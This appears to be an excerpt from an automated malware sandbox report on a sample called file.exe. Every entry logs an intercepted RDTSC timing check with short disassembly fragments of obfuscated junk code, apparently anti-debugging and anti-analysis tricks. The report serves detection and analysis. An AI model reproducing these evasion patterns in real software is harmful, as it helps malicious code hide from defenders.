                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DF82B second address: 11DF835 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7ADCC94D4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1181035 second address: 1181055 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCB94CCAh 0x00000007 jmp 00007F7ADCB94CCEh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1181055 second address: 1181059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1181059 second address: 1181080 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7ADCB94CD0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 js 00007F7ADCB94CC6h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1181080 second address: 11810AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCC94D4Dh 0x00000007 jmp 00007F7ADCC94D59h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11810AA second address: 11810B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DCA4C second address: 11DCA50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DCA50 second address: 11DCA54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E0EB0 second address: 11E0EB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E00E8 second address: 11E00EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E2EE1 second address: 11E2EE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E2EE5 second address: 11E2EEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E6B16 second address: 11E6B39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCC94D4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jng 00007F7ADCC94D46h 0x00000013 jns 00007F7ADCC94D46h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E6B39 second address: 11E6B57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F7ADCB94CD5h 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E6B57 second address: 11E6B75 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F7ADCC94D54h 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EC6F7 second address: 11EC6FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F0420 second address: 11F0449 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7ADCC94D46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c jmp 00007F7ADCC94D4Fh 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jno 00007F7ADCC94D46h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F0449 second address: 11F044D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F044D second address: 11F0453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F0453 second address: 11F0479 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCB94CCAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e jmp 00007F7ADCB94CD2h 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F0479 second address: 11F04A4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 jmp 00007F7ADCC94D59h 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F05F0 second address: 11F0613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7ADCB94CD6h 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop edi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CDA30 second address: 11CDA34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CDA34 second address: 11CDA38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F06CF second address: 1021B4F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 add dword ptr [esp], 2CE0A5FEh 0x0000000e jmp 00007F7ADCC94D4Ch 0x00000013 push dword ptr [ebp+122D0D35h] 0x00000019 jmp 00007F7ADCC94D57h 0x0000001e call dword ptr [ebp+122D300Bh] 0x00000024 pushad 0x00000025 mov dword ptr [ebp+122D1AF9h], edx 0x0000002b xor eax, eax 0x0000002d pushad 0x0000002e mov ebx, 32939EE0h 0x00000033 mov si, bx 0x00000036 popad 0x00000037 xor dword ptr [ebp+122D1AF9h], edi 0x0000003d mov edx, dword ptr [esp+28h] 0x00000041 jmp 00007F7ADCC94D59h 0x00000046 mov dword ptr [ebp+122D2A55h], eax 0x0000004c cld 0x0000004d mov esi, 0000003Ch 0x00000052 cld 0x00000053 add esi, dword ptr [esp+24h] 0x00000057 stc 0x00000058 lodsw 0x0000005a sub dword ptr [ebp+122D1AF9h], edx 0x00000060 add eax, dword ptr [esp+24h] 0x00000064 jc 00007F7ADCC94D4Eh 0x0000006a jl 00007F7ADCC94D48h 0x00000070 pushad 0x00000071 popad 0x00000072 mov ebx, dword ptr [esp+24h] 0x00000076 stc 0x00000077 nop 0x00000078 push eax 0x00000079 push edx 0x0000007a jmp 00007F7ADCC94D50h 0x0000007f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F74A7 second address: 11F74B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F7ADCB94CDBh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F74B5 second address: 11F74CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7ADCC94D4Fh 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F6C0F second address: 11F6C15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F6C15 second address: 11F6C1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F6EFF second address: 11F6F0B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F6F0B second address: 11F6F27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F7ADCC94D46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7ADCC94D4Ch 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F6F27 second address: 11F6F38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F7ADCB94CCBh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F6F38 second address: 11F6F5D instructions: 0x00000000 rdtsc 0x00000002 je 00007F7ADCC94D46h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7ADCC94D51h 0x00000013 je 00007F7ADCC94D46h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F6F5D second address: 11F6F7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCB94CD9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F70B6 second address: 11F70BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F70BC second address: 11F70C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F71E9 second address: 11F71F3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7ADCC94D46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F71F3 second address: 11F71FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F71FC second address: 11F7202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FE916 second address: 11FE91A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FEBE5 second address: 11FEBE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FEBE9 second address: 11FEBF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FEBF3 second address: 11FEC0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCC94D54h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FF041 second address: 11FF057 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCB94CD2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FF057 second address: 11FF05D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FF05D second address: 11FF077 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCB94CD5h 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FE6A1 second address: 11FE6A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FF5B5 second address: 11FF5C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7ADCB94CC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1187AC8 second address: 1187AE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 jng 00007F7ADCC94D46h 0x0000000d jmp 00007F7ADCC94D4Dh 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1207D5A second address: 1207D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1207D5E second address: 1207D87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCC94D50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007F7ADCC94D4Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pop edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1207D87 second address: 1207D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1206889 second address: 120689F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7ADCC94D52h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120689F second address: 12068A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1206B22 second address: 1206B2C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1206B2C second address: 1206B30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1206DF4 second address: 1206DFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120724E second address: 1207254 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12073C4 second address: 12073C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12073C8 second address: 12073D2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7ADCB94CC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12073D2 second address: 12073DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F7ADCC94D46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12073DC second address: 12073E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118CAC3 second address: 118CACF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F7ADCC94D46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118CACF second address: 118CAD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1207BA8 second address: 1207BAD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1207BAD second address: 1207BCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7ADCB968D8h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1207BCE second address: 1207C01 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F7ADCEF9157h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007F7ADCEF914Bh 0x00000013 jg 00007F7ADCEF9162h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C785A second address: 11C785E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C785E second address: 11C787F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCEF9159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C795E second address: 11C79C3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jne 00007F7ADCB968D0h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jmp 00007F7ADCB968CCh 0x00000017 mov eax, dword ptr [eax] 0x00000019 push eax 0x0000001a pushad 0x0000001b jmp 00007F7ADCB968CEh 0x00000020 jmp 00007F7ADCB968D6h 0x00000025 popad 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b pushad 0x0000002c pushad 0x0000002d pushad 0x0000002e popad 0x0000002f jns 00007F7ADCB968C6h 0x00000035 popad 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C79C3 second address: 11C79C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C79C7 second address: 11C79F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 sbb edx, 42CEC1F2h 0x0000000e call 00007F7ADCB968C9h 0x00000013 push ecx 0x00000014 jmp 00007F7ADCB968CAh 0x00000019 pop ecx 0x0000001a push eax 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C7E30 second address: 11C7E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 jo 00007F7ADCEF9150h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C8665 second address: 11C8689 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jmp 00007F7ADCB968D9h 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C8689 second address: 11B019A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007F7ADCEF9148h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 sub ecx, dword ptr [ebp+122D2D4Dh] 0x00000029 mov edi, dword ptr [ebp+122D2C2Dh] 0x0000002f lea eax, dword ptr [ebp+12478FFFh] 0x00000035 push eax 0x00000036 jns 00007F7ADCEF914Eh 0x0000003c mov dword ptr [esp], eax 0x0000003f push 00000000h 0x00000041 push ebx 0x00000042 call 00007F7ADCEF9148h 0x00000047 pop ebx 0x00000048 mov dword ptr [esp+04h], ebx 0x0000004c add dword ptr [esp+04h], 00000019h 0x00000054 inc ebx 0x00000055 push ebx 0x00000056 ret 0x00000057 pop ebx 0x00000058 ret 0x00000059 mov cl, FDh 0x0000005b mov dh, BFh 0x0000005d call dword ptr [ebp+1244C83Ch] 0x00000063 push eax 0x00000064 push edx 0x00000065 jo 00007F7ADCEF9148h 0x0000006b push edx 0x0000006c pop edx 0x0000006d jmp 00007F7ADCEF9154h 0x00000072 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120C551 second address: 120C55C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120C55C second address: 120C562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120C562 second address: 120C56E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F7ADCB968C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120C97B second address: 120C980 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120C980 second address: 120C986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120C986 second address: 120C998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F7ADCEF914Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120C998 second address: 120C9A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120CC8D second address: 120CC93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120CC93 second address: 120CC98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120CC98 second address: 120CCA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1210AB2 second address: 1210AB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1213203 second address: 1213243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F7ADCEF914Ah 0x0000000b jmp 00007F7ADCEF9157h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 jmp 00007F7ADCEF914Eh 0x00000019 jns 00007F7ADCEF9146h 0x0000001f pop edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12133B7 second address: 12133BE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121351D second address: 121353C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCEF9159h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121353C second address: 121355A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7ADCB968CEh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7ADCB968CAh 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121355A second address: 121355E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
